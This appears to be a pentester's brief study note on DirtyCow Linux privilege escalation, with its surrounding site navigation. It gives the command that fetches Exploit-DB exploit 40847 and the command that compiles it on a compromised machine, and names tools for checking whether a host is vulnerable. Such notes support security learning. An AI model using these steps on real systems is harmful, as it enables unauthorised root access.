DirtyCow Privilege Escalation

28/06/2023

shuciran

Exploit-DB (searchsploit)

You can download the .cpp (C++) script with the following command:

searchsploit -m linux/local/40847.cpp

This is to compile within the compromised machine:

  
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

This only works if the machine is vulnerable to dirty cow, you can use linpeas or linux exploit suggester to check for it. And also the machine must has the g++ installed for the exploit compilation.

04 Privilege Escalation, Linux - DirtyCow

pkexec dirtycow

Reverse Shells
Finding GUID with ipainstaller
Plist Files
Signing IPA with Sideloadly (Non-jailbroken)
Signing IPA with TrollStore (Non-jailbroken)

exploitation wireless file transfer hackthebox active directory scr windows privesc mobile linux enumeration linux privesc

DirtyCow Privilege Escalation

Exploit-DB (searchsploit)

Pkexec Privilege Escalation

SUID Screen Exploitation

Python Library Hijacking